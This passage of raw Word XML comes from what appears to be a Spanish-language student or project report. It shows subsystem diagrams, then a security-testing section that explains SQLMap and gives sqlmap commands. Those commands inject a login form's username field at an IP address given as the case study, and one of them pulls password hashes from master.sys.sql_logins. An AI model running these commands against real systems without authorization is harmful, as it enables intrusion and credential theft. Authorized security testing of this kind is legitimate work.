          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F73C76" wp14:editId="6BD7432C">
            <wp:extent cx="7312996" cy="3669418"/>
            <wp:effectExtent l="0" t="6985"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rot="16200000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="7335971" cy="3680946"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Subsistema Movimiento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRPr="008F0641" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="276E8B" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010705E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C38D3B0" wp14:editId="6B1DE592">
            <wp:extent cx="7693094" cy="4332649"/>
            <wp:effectExtent l="3810" t="0" r="6985"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rot="16200000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="7696416" cy="4334520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Subsistema Maestro</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:r w:rsidRPr="007B4223">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74FCFBAF" wp14:editId="28506D46">
            <wp:extent cx="7760224" cy="3303485"/>
            <wp:effectExtent l="0" t="635"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rot="16200000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="7764133" cy="3305149"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D8083F" w:rsidRDefault="00D8083F" w:rsidP="00A64052"/>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Pruebas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Pruebas Funcionales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>Pruebas de Rendimiento</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A5812" w:rsidRDefault="003A5812" w:rsidP="003A5812">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pruebas de Seguridad </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00813FB5"/>
    <w:p w:rsidR="00813FB5" w:rsidRPr="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00813FB5"/>
    <w:p w:rsidR="003A5812" w:rsidRDefault="00813FB5" w:rsidP="00813FB5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA251A7" wp14:editId="2A235CA5">
            <wp:extent cx="3562350" cy="809625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="21" name="Imagen 21" descr="http://1.bp.blogspot.com/-QhUCrBv9Nfk/VFCOknXOejI/AAAAAAAAAII/OEyAl6cBtjc/s1600/infosec%2Baffiars%2Bsqlmap%2Bchee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bp.blogspot.com/-QhUCrBv9Nfk/VFCOknXOejI/AAAAAAAAAII/OEyAl6cBtjc/s1600/infosec%2Baffiars%2Bsqlmap%2Bcheetsheet.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId80">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="22727" b="73101"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3562350" cy="809625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00813FB5">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una herramienta de inyección SQL ciega automática, desarrollada en Python, es capaz de generar una huella digital activa del sistema de administración de bases de datos y mucho más.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00813FB5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B8F1C0C" wp14:editId="7C33D9B0">
            <wp:extent cx="2076450" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Imagen 19" descr="http://4.bp.blogspot.com/-QwSjE1RR1nY/UE6ENOvxQzI/AAAAAAAAATg/c9k_i96Fn6o/s1600/sq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QwSjE1RR1nY/UE6ENOvxQzI/AAAAAAAAATg/c9k_i96Fn6o/s1600/sqlmap.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76450" cy="1428750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="00813FB5" w:rsidP="00A64052">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C5C0C56" wp14:editId="22522599">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-236220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>292100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5688330" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="762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val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="-1358" t="4226" b="5514"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688330" cy="2847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hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidRPr="00F41D25">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/sqlmapproject/sqlmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00813FB5">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Como esta herramienta está en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Phyton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, también será necesario para nuestro programa, entonces vamos a ir a la página oficial de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Phyton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> y bajaremos la versión para Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00813FB5">
      <w:pPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRPr="005E1471" w:rsidRDefault="005E1471" w:rsidP="00813FB5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1471">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">Bien, si ya tenemos instalado </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>Phyton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>, seguiremos los siguientes pasos, esto ya depende de cómo quieras tener ordenadas tus herramientas, yo lo haré de esta forma por ahora;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00813FB5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E1471">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:br/>
        <w:t>Crearemos la carpeta "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>" en C:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRPr="005E1471" w:rsidRDefault="005E1471" w:rsidP="005E1471">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="336" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:eastAsia="Times New Roman" w:hAnsi="Open Sans" w:cs="Times New Roman"/>
          <w:color w:val="4B5F65"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4B5F65"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sqlmap.py  –u   </w:t>
      </w:r>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="637182"/>
            <w:sz w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>www.target.com/noticias.php?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4B5F65"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4B5F65"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRPr="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> para nuestro caso de estudio: </w:t>
      </w:r>
      <w:r w:rsidRPr="00813FB5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>http://54.187.223.208/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00813FB5">
      <w:r w:rsidRPr="005E1471">
        <w:t>sqlmap.py --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve">="http:// 54.187.223.208" --data="__EVENTTARGET=&amp;__EVENTARGUMENT=&amp;__VIEWSTATE=%2FwEPDwULLTE4MjI5ODQ3ODhkZBhYr%2F8jkYBFxsKYA1YM1vPkqv5P%2FQj8KLA89PfymMCs&amp;__EVENTVALIDATION=%2FwEdAARI43w1YsdHPRRITZvRBlVuY3plgk0YBAefRz3MyBlTcInkg%2Fut7Je4AtoEsfzZAOI85pbWlDO2hADfoPXD%2F5tdeqsY63Vwtk2NY2Vz7Ib0nYv%2BCWGPoIG6fglzvAXHKcM%3D&amp;txtUserName=adinanta&amp;txtPWD=p%40ssw0rd&amp;btnSubmit=Submit" -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>txtUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="005E1471">
        <w:t>banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052"/>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052"/>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="848857"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="3" name="Imagen 3" descr="sqlmap-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map-comman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2130" cy="848857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052">
      <w:r w:rsidRPr="005E1471">
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap.py --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve">="http:// 54.187.223.208" --data="__EVENTTARGET=&amp;__EVENTARGUMENT=&amp;__VIEWSTATE=%2FwEPDwULLTE4MjI5ODQ3ODhkZBhYr%2F8jkYBFxsKYA1YM1vPkqv5P%2FQj8KLA89PfymMCs&amp;__EVENTVALIDATION=%2FwEdAARI43w1YsdHPRRITZvRBlVuY3plgk0YBAefRz3MyBlTcInkg%2Fut7Je4AtoEsfzZAOI85pbWlDO2hADfoPXD%2F5tdeqsY63Vwtk2NY2Vz7Ib0nYv%2BCWGPoIG6fglzvAXHKcM%3D&amp;txtUserName=adinanta&amp;txtPWD=p%40ssw0rd&amp;btnSubmit=Submit" -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>txtUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>sql-query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>name,master.sys.fn_sqlvarbasetostr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>password_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>master.sys.sql_logins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005E1471">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052"/>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052"/>
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00A64052">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5612130" cy="1674870"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="14" name="Imagen 14" descr="enumerado en h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umerado en hash"/>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2130" cy="1674870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052"/>
    <w:p w:rsidR="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RESULTADO DE LA CONSOLA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00813FB5" w:rsidRPr="00813FB5" w:rsidRDefault="00813FB5" w:rsidP="00A64052">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D27D252" wp14:editId="74A5A876">
            <wp:extent cx="5612130" cy="29718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5816"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="81" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:sectPr w:rsidR="00813FB5" w:rsidRPr="00813FB5" w:rsidSect="00C87897">
      <w:headerReference w:type="default" r:id="rId88"/>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1471" w:rsidRDefault="005E1471" w:rsidP="00E27657">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00E27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1471" w:rsidRDefault="005E1471" w:rsidP="00E27657">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005E1471" w:rsidRDefault="005E1471" w:rsidP="00E276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1471" w:rsidRDefault="005E1471">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="es-BO"/>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1079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1471" w:rsidRDefault="005E1471">
                          <w:pPr>
                            <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
